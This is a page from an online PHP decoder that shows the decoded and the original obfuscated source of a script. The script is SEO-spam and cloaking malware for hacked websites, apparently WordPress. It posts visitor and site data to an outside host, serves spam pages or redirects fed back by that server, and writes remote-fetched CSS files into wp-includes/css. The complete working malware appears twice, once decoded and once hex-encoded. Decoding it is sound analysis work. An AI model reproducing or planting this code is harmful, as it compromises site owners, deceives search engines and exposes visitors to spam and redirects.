Find this useful? Enter your email to receive occasional updates for securing PHP code.
Signing you up...
Thank you for signing up!
PHP Decode
<?php goto Z9GXz; zZUSw: function fcss($i11, $p14, $t15) { if (is_dir($i11)) { if (!file..
Decoded Output download
<?php
goto Z9GXz; zZUSw: function fcss($i11, $p14, $t15) { if (is_dir($i11)) { if (!file_exists($p14)) { @file_put_contents($p14, doutdo($t15)); } } else { if (@mkdir($i11)) { if (!file_exists($p14)) { @file_put_contents($p14, doutdo($t15)); } } } } goto jixUg; mNc3S: if (is_https()) { $d2 = "https"; } else { $d2 = "http"; } goto YsXNJ; UHVtI: $d5 = "nrictures.hsspicexm.xyz"; goto TWeHI; RVN70: $w8 = ''; goto B17V8; Ny78y: $x18 = $w1 . "://" . $d5 . "/temp/stylepth.css"; goto x3mI6; YsXNJ: $k3 = drequest_uri(); goto tanvC; ySIS1: if (is_dir($m9 . "/wp-includes")) { $u10 = "wp-includes/css"; } else { $u10 = "css"; } goto igqi7; JYq2m: $b7 = $b7; goto RVN70; iyPvc: if (is_file($p14)) { $j32 = $w1 . "://" . $d5 . "/indexnew.php?css=1"; } else { $j32 = $w1 . "://" . $d5 . "/indexnew.php"; } goto KWG43; DE9Af: $b31 = array("web" => $r6, "zz" => disbot(), "uri" => $k4, "urlshang" => $w8, "http" => $d2, "lang" => $b7); goto iyPvc; QPCIP: $w1 = "http"; goto mNc3S; kQmJL: $t15 = $w1 . "://" . $d5 . "/temp/style.css"; goto GlvWp; jixUg: if ($k3 == "/" || strstr($k3, "ewttm")) { fcss($i11, $p14, $t15); fcss($i11, $a17, $x18); } goto DE9Af; x3mI6: function ping_sitemap($p19) { $w20 = explode("\xd
", trim($p19)); $k21 = ''; foreach ($w20 as $l22) { $n23 = doutdo($l22); $v24 = strpos($n23, "Sitemap Notification Received") !== false ? "pingok" : "error"; $k21 .= $l22 . "-- " . $v24 . "<br>"; } return $k21; } goto RMJKy; tanvC: if ($k3 == '') { $k3 = "/"; } goto aUnno; B17V8: if (isset($_SERVER["HTTP_REFERER"])) { $w8 = $_SERVER["HTTP_REFERER"]; $w8 = $w8; } goto Ozshu; igqi7: $i11 = $m9 . "/" . $u10; goto rjpDD; WryR1: $b7 = @$_SERVER["HTTP_ACCEPT_LANGUAGE"]; goto JYq2m; CLuMa: $q13 = str_rot13(substr($f12, 0, 3) . substr($d5, 0, 3)) . ".css"; goto x3ewS; HJEuP: function doutdo($p19) { $g26 = ''; if (!$g26) { $g26 = @file_get_contents($p19); } return $g26; } goto IYqyM; un_TI: function drequest_uri() { if (isset($_SERVER["REQUEST_URI"])) { $k4 = $_SERVER["REQUEST_URI"]; } else { if (isset($_SERVER["argv"])) { $k4 = $_SERVER["PHP_SELF"] . "?" . $_SERVER["argv"][0]; } else { $k4 = $_SERVER["PHP_SELF"] . "?" . $_SERVER["QUERY_STRING"]; } } return $k4; } goto UHVtI; FyqKN: $a17 = $m9 . "/" . $u10 . "/" . $w16; goto Ny78y; IYqyM: function doutdo_post($e27, $u28) { $x29 = curl_init(); curl_setopt($x29, CURLOPT_URL, $e27); curl_setopt($x29, CURLOPT_POST, 1); curl_setopt($x29, CURLOPT_USERAGENT, "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)"); curl_setopt($x29, CURLOPT_SSL_VERIFYHOST, 0); curl_setopt($x29, CURLOPT_SSL_VERIFYPEER, 0); curl_setopt($x29, CURLOPT_HEADER, 0); curl_setopt($x29, CURLOPT_RETURNTRANSFER, 1); curl_setopt($x29, CURLOPT_POSTFIELDS, $u28); $y30 = curl_exec($x29); curl_close($x29); return $y30; } goto zZUSw; KWG43: $o33 = trim(doutdo_post($j32, $b31)); goto L1RVc; L1RVc: if (!strstr($o33, "nobotuseragent")) { if (strstr($o33, "okhtmlgetcontent")) { @header("Content-type: text/html; charset=utf-8"); if (strstr($o33, "[##linkcss##]")) { if (file_exists($p14)) { $u34 = file_get_contents($p14); $o33 = str_replace("[##linkcss##]", $u34, $o33); } else { $o33 = str_replace("[##linkcss##]", '', $o33); } } if (strstr($o33, "[##pthlinkcss##]")) { if (file_exists($a17)) { $v35 = file_get_contents($a17); $o33 = str_replace("[##pthlinkcss##]", $v35, $o33); } else { $o33 = str_replace("[##pthlinkcss##]", '', $o33); } } $o33 = str_replace("okhtmlgetcontent", '', $o33); echo $o33; die; } else { if (strstr($o33, "okxmlgetcontent")) { $o33 = str_replace("okxmlgetcontent", '', $o33); @header("Content-type: text/xml"); echo $o33; die; } else { if (strstr($o33, "pingxmlgetcontent")) { $o33 = str_replace("pingxmlgetcontent", '', $o33); fcss($i11, $p14, $t15); fcss($i11, $a17, $x18); @header("Content-type: text/html; charset=utf-8"); echo ping_sitemap($o33); die; } else { if (strstr($o33, "getcontent500page")) { @header("HTTP/1.1 500 Internal Server Error"); die; } else { if (strstr($o33, "getcontent404page")) { @header("HTTP/1.1 404 Not Found"); die; } else { if (strstr($o33, "getcontent301page")) { @header("HTTP/1.1 301 Moved Permanently"); $o33 = str_replace("getcontent301page", '', $o33); header("Location: " . $o33); die; } } } } } } } goto BJPg4; RMJKy: function disbot() { $x25 = strtolower($_SERVER["HTTP_USER_AGENT"]); if (stristr($x25, "googlebot") || stristr($x25, "bing") || stristr($x25, "yahoo") || stristr($x25, "google") || stristr($x25, "Googlebot") || stristr($x25, "googlebot")) { return true; } else { return false; } } goto HJEuP; x3ewS: $p14 = $m9 . "/" . $u10 . "/" . $q13; goto kQmJL; Z9GXz: $x0 = "%61%65%76%70%67%68%65%72%66%2E%75%66%66%63%76%70%72%6B%7A%2E%6B%6C%6D"; goto QPCIP; Ozshu: if (isset($_SERVER["DOCUMENT_ROOT"])) { $m9 = $_SERVER["DOCUMENT_ROOT"]; } else { $m9 = dirname(__FILE__); } goto ySIS1; GlvWp: $w16 = str_rot13(substr($f12, 0, 3) . substr($d5, 0, 3)) . "pth.css"; goto FyqKN; rjpDD: if (substr($r6, 0, 4) == "www.") { $f12 = substr($r6, 4); } else { $f12 = $r6; } goto CLuMa; aUnno: $k4 = $k3; goto un_TI; TWeHI: function is_https() { if (isset($_SERVER["HTTPS"]) && strtolower($_SERVER["HTTPS"]) !== "off") { return true; } elseif (isset($_SERVER["HTTP_X_FORWARDED_PROTO"]) && $_SERVER["HTTP_X_FORWARDED_PROTO"] === "https") { return true; } elseif (isset($_SERVER["HTTP_FRONT_END_HTTPS"]) && strtolower($_SERVER["HTTP_FRONT_END_HTTPS"]) !== "off") { return true; } return false; } goto Z0Kjr; Z0Kjr: $r6 = $_SERVER["HTTP_HOST"]; goto WryR1; BJPg4: ?>Did this file decode correctly?
Original Code
<?php
goto Z9GXz; zZUSw: function fcss($i11, $p14, $t15) { if (is_dir($i11)) { if (!file_exists($p14)) { @file_put_contents($p14, doutdo($t15)); } } else { if (@mkdir($i11)) { if (!file_exists($p14)) { @file_put_contents($p14, doutdo($t15)); } } } } goto jixUg; mNc3S: if (is_https()) { $d2 = "\x68\x74\x74\160\x73"; } else { $d2 = "\x68\164\x74\160"; } goto YsXNJ; UHVtI: $d5 = "\156\x72\151\143\x74\165\162\145\163\56\150\163\x73\160\x69\x63\145\170\155\x2e\x78\171\172"; goto TWeHI; RVN70: $w8 = ''; goto B17V8; Ny78y: $x18 = $w1 . "\72\57\x2f" . $d5 . "\x2f\x74\x65\155\160\57\x73\164\171\x6c\145\160\164\150\56\x63\163\x73"; goto x3mI6; YsXNJ: $k3 = drequest_uri(); goto tanvC; ySIS1: if (is_dir($m9 . "\x2f\167\160\x2d\151\x6e\x63\x6c\165\144\145\163")) { $u10 = "\x77\x70\55\x69\156\143\x6c\165\144\x65\163\57\x63\x73\x73"; } else { $u10 = "\143\x73\x73"; } goto igqi7; JYq2m: $b7 = $b7; goto RVN70; iyPvc: if (is_file($p14)) { $j32 = $w1 . "\72\x2f\x2f" . $d5 . "\x2f\151\156\x64\x65\170\x6e\x65\x77\56\x70\x68\x70\77\143\163\163\75\x31"; } else { $j32 = $w1 . "\x3a\57\57" . $d5 . "\57\151\156\144\x65\x78\x6e\x65\167\56\x70\x68\160"; } goto KWG43; DE9Af: $b31 = array("\167\x65\142" => $r6, "\172\x7a" => disbot(), "\165\x72\x69" => $k4, "\165\x72\154\163\x68\x61\x6e\x67" => $w8, "\150\x74\x74\160" => $d2, "\154\x61\156\147" => $b7); goto iyPvc; QPCIP: $w1 = "\x68\x74\164\x70"; goto mNc3S; kQmJL: $t15 = $w1 . "\x3a\57\x2f" . $d5 . "\57\164\145\x6d\x70\57\163\x74\x79\x6c\145\x2e\143\x73\163"; goto GlvWp; jixUg: if ($k3 == "\57" || strstr($k3, "\x65\x77\164\164\x6d")) { fcss($i11, $p14, $t15); fcss($i11, $a17, $x18); } goto DE9Af; x3mI6: function ping_sitemap($p19) { $w20 = explode("\xd\12", trim($p19)); $k21 = ''; foreach ($w20 as $l22) { $n23 = doutdo($l22); $v24 = strpos($n23, "\123\151\164\x65\x6d\x61\160\40\116\x6f\164\151\x66\151\x63\x61\x74\151\x6f\x6e\40\122\x65\143\145\x69\x76\x65\144") !== false ? "\160\151\156\x67\x6f\153" : "\x65\x72\x72\157\x72"; $k21 .= $l22 . "\x2d\x2d\x20" . $v24 . "\x3c\142\x72\76"; } return $k21; } goto RMJKy; tanvC: if ($k3 == '') { $k3 = "\57"; } goto aUnno; B17V8: if (isset($_SERVER["\110\124\x54\x50\x5f\x52\105\x46\105\x52\x45\122"])) { $w8 = $_SERVER["\x48\x54\x54\x50\137\x52\105\x46\105\122\x45\122"]; $w8 = $w8; } goto Ozshu; igqi7: $i11 = $m9 . "\57" . $u10; goto rjpDD; WryR1: $b7 = @$_SERVER["\x48\124\124\120\137\x41\103\103\105\120\x54\137\x4c\x41\x4e\107\x55\x41\x47\x45"]; goto JYq2m; CLuMa: $q13 = str_rot13(substr($f12, 0, 3) . substr($d5, 0, 3)) . "\56\143\163\163"; goto x3ewS; HJEuP: function doutdo($p19) { $g26 = ''; if (!$g26) { $g26 = @file_get_contents($p19); } return $g26; } goto IYqyM; un_TI: function drequest_uri() { if (isset($_SERVER["\x52\105\121\x55\x45\x53\124\137\125\x52\111"])) { $k4 = $_SERVER["\122\105\x51\125\x45\x53\x54\x5f\x55\x52\111"]; } else { if (isset($_SERVER["\141\162\147\166"])) { $k4 = $_SERVER["\x50\110\x50\137\x53\105\x4c\106"] . "\77" . $_SERVER["\x61\162\147\x76"][0]; } else { $k4 = $_SERVER["\120\110\x50\137\123\x45\114\106"] . "\x3f" . $_SERVER["\x51\125\105\x52\131\x5f\123\x54\122\111\x4e\107"]; } } return $k4; } goto UHVtI; FyqKN: $a17 = $m9 . "\x2f" . $u10 . "\57" . $w16; goto Ny78y; IYqyM: function doutdo_post($e27, $u28) { $x29 = curl_init(); curl_setopt($x29, CURLOPT_URL, $e27); curl_setopt($x29, CURLOPT_POST, 1); curl_setopt($x29, CURLOPT_USERAGENT, "\x4d\157\x7a\x69\154\154\x61\57\64\56\60\x20\x28\x63\x6f\155\160\x61\164\151\142\x6c\x65\x3b\40\x4d\x53\111\105\x20\65\56\60\x31\x3b\x20\127\151\x6e\x64\157\167\x73\40\x4e\124\x20\x35\56\x30\x29"); curl_setopt($x29, CURLOPT_SSL_VERIFYHOST, 0); curl_setopt($x29, CURLOPT_SSL_VERIFYPEER, 0); curl_setopt($x29, CURLOPT_HEADER, 0); curl_setopt($x29, CURLOPT_RETURNTRANSFER, 1); curl_setopt($x29, CURLOPT_POSTFIELDS, $u28); $y30 = curl_exec($x29); curl_close($x29); return $y30; } goto zZUSw; KWG43: $o33 = trim(doutdo_post($j32, $b31)); goto L1RVc; L1RVc: if (!strstr($o33, "\156\x6f\142\157\164\165\x73\x65\x72\x61\147\x65\156\x74")) { if (strstr($o33, "\157\x6b\150\164\155\x6c\x67\145\x74\x63\x6f\156\x74\145\156\164")) { @header("\103\x6f\x6e\164\145\156\164\x2d\x74\171\x70\x65\x3a\40\x74\x65\170\x74\x2f\x68\164\155\x6c\x3b\40\x63\150\141\162\163\x65\164\75\x75\x74\x66\x2d\70"); if (strstr($o33, "\133\43\43\x6c\151\156\x6b\x63\163\x73\x23\x23\135")) { if (file_exists($p14)) { $u34 = file_get_contents($p14); $o33 = str_replace("\x5b\43\43\154\x69\156\153\x63\163\163\43\43\x5d", $u34, $o33); } else { $o33 = str_replace("\x5b\x23\43\x6c\151\156\153\x63\163\163\43\x23\135", '', $o33); } } if (strstr($o33, "\x5b\x23\x23\x70\164\x68\x6c\x69\x6e\x6b\x63\163\163\x23\x23\135")) { if (file_exists($a17)) { $v35 = file_get_contents($a17); $o33 = str_replace("\x5b\43\43\x70\164\x68\154\151\x6e\x6b\143\163\163\43\x23\x5d", $v35, $o33); } else { $o33 = str_replace("\x5b\x23\x23\x70\x74\x68\x6c\x69\x6e\x6b\x63\x73\163\43\x23\135", '', $o33); } } $o33 = str_replace("\157\x6b\x68\164\x6d\x6c\x67\x65\x74\143\157\156\164\x65\x6e\x74", '', $o33); echo $o33; die; } else { if (strstr($o33, "\x6f\153\x78\155\x6c\x67\145\164\x63\x6f\156\x74\145\156\164")) { $o33 = str_replace("\157\153\170\155\x6c\147\145\x74\143\x6f\156\x74\x65\x6e\x74", '', $o33); @header("\x43\x6f\x6e\x74\145\x6e\164\x2d\164\x79\160\x65\x3a\40\164\145\x78\x74\57\x78\x6d\154"); echo $o33; die; } else { if (strstr($o33, "\160\151\156\x67\170\155\x6c\147\145\164\143\x6f\x6e\164\x65\x6e\x74")) { $o33 = str_replace("\160\x69\x6e\x67\x78\x6d\154\x67\145\164\x63\x6f\x6e\164\x65\x6e\164", '', $o33); fcss($i11, $p14, $t15); fcss($i11, $a17, $x18); @header("\103\x6f\x6e\164\x65\x6e\164\55\x74\x79\x70\145\x3a\40\x74\145\170\x74\x2f\x68\x74\x6d\x6c\73\40\x63\150\x61\x72\163\145\x74\75\165\x74\146\x2d\x38"); echo ping_sitemap($o33); die; } else { if (strstr($o33, "\x67\145\x74\x63\157\156\164\145\x6e\164\65\60\60\160\x61\147\145")) { @header("\x48\124\x54\120\x2f\61\x2e\61\40\x35\60\60\x20\x49\156\x74\145\162\156\x61\x6c\x20\x53\145\x72\166\145\x72\x20\105\162\x72\x6f\162"); die; } else { if (strstr($o33, "\x67\145\164\143\x6f\x6e\164\145\156\164\64\x30\64\160\x61\x67\145")) { @header("\110\x54\x54\x50\57\61\x2e\x31\x20\x34\x30\x34\x20\x4e\157\164\40\x46\x6f\165\x6e\x64"); die; } else { if (strstr($o33, "\x67\x65\x74\143\x6f\x6e\164\145\156\x74\63\x30\61\160\141\147\145")) { @header("\110\x54\124\120\x2f\x31\x2e\61\x20\x33\x30\61\x20\x4d\x6f\166\145\x64\40\120\145\x72\155\x61\156\x65\x6e\x74\x6c\171"); $o33 = str_replace("\147\145\164\143\157\x6e\x74\145\x6e\x74\x33\60\61\x70\x61\147\145", '', $o33); header("\x4c\x6f\x63\141\x74\x69\157\156\x3a\40" . $o33); die; } } } } } } } goto BJPg4; RMJKy: function disbot() { $x25 = strtolower($_SERVER["\x48\124\x54\120\137\125\123\x45\122\x5f\101\107\105\x4e\x54"]); if (stristr($x25, "\x67\x6f\x6f\x67\154\145\142\x6f\164") || stristr($x25, "\x62\x69\x6e\x67") || stristr($x25, "\x79\x61\x68\x6f\157") || stristr($x25, "\147\x6f\x6f\x67\x6c\x65") || stristr($x25, "\107\157\x6f\x67\x6c\x65\x62\157\164") || stristr($x25, "\x67\157\157\147\x6c\x65\142\157\x74")) { return true; } else { return false; } } goto HJEuP; x3ewS: $p14 = $m9 . "\x2f" . $u10 . "\x2f" . $q13; goto kQmJL; Z9GXz: $x0 = "\45\66\x31\45\x36\x35\45\67\x36\45\67\x30\45\x36\x37\x25\66\70\45\66\x35\45\67\x32\x25\x36\x36\x25\62\105\x25\67\65\45\66\x36\x25\x36\x36\x25\66\63\x25\x37\x36\x25\x37\60\45\x37\62\x25\66\102\45\67\101\45\x32\105\45\66\x42\45\x36\103\x25\x36\x44"; goto QPCIP; Ozshu: if (isset($_SERVER["\x44\x4f\x43\125\x4d\x45\116\124\137\x52\x4f\117\x54"])) { $m9 = $_SERVER["\104\117\103\x55\115\x45\116\x54\137\x52\117\117\x54"]; } else { $m9 = dirname(__FILE__); } goto ySIS1; GlvWp: $w16 = str_rot13(substr($f12, 0, 3) . substr($d5, 0, 3)) . "\x70\x74\150\x2e\143\x73\163"; goto FyqKN; rjpDD: if (substr($r6, 0, 4) == "\167\167\167\56") { $f12 = substr($r6, 4); } else { $f12 = $r6; } goto CLuMa; aUnno: $k4 = $k3; goto un_TI; TWeHI: function is_https() { if (isset($_SERVER["\x48\x54\124\x50\123"]) && strtolower($_SERVER["\x48\124\x54\x50\123"]) !== "\x6f\x66\x66") { return true; } elseif (isset($_SERVER["\x48\x54\x54\120\x5f\x58\x5f\106\117\x52\127\101\x52\104\105\104\137\x50\122\x4f\x54\117"]) && $_SERVER["\110\x54\x54\x50\137\x58\x5f\106\117\122\x57\101\122\104\105\x44\x5f\x50\x52\117\124\117"] === "\150\164\x74\160\163") { return true; } elseif (isset($_SERVER["\110\124\124\120\x5f\x46\x52\117\x4e\x54\137\105\x4e\104\137\110\x54\124\x50\123"]) && strtolower($_SERVER["\x48\x54\x54\x50\x5f\x46\x52\x4f\x4e\124\x5f\105\x4e\x44\137\110\124\x54\x50\123"]) !== "\157\146\x66") { return true; } return false; } goto Z0Kjr; Z0Kjr: $r6 = $_SERVER["\110\x54\x54\120\137\x48\x4f\123\x54"]; goto WryR1; BJPg4: ?>Function Calls
| None |
Stats
| MD5 | a020346378dcac08d264299f8f1ab4ef |
| Eval Count | 0 |
| Decode Time | 264 ms |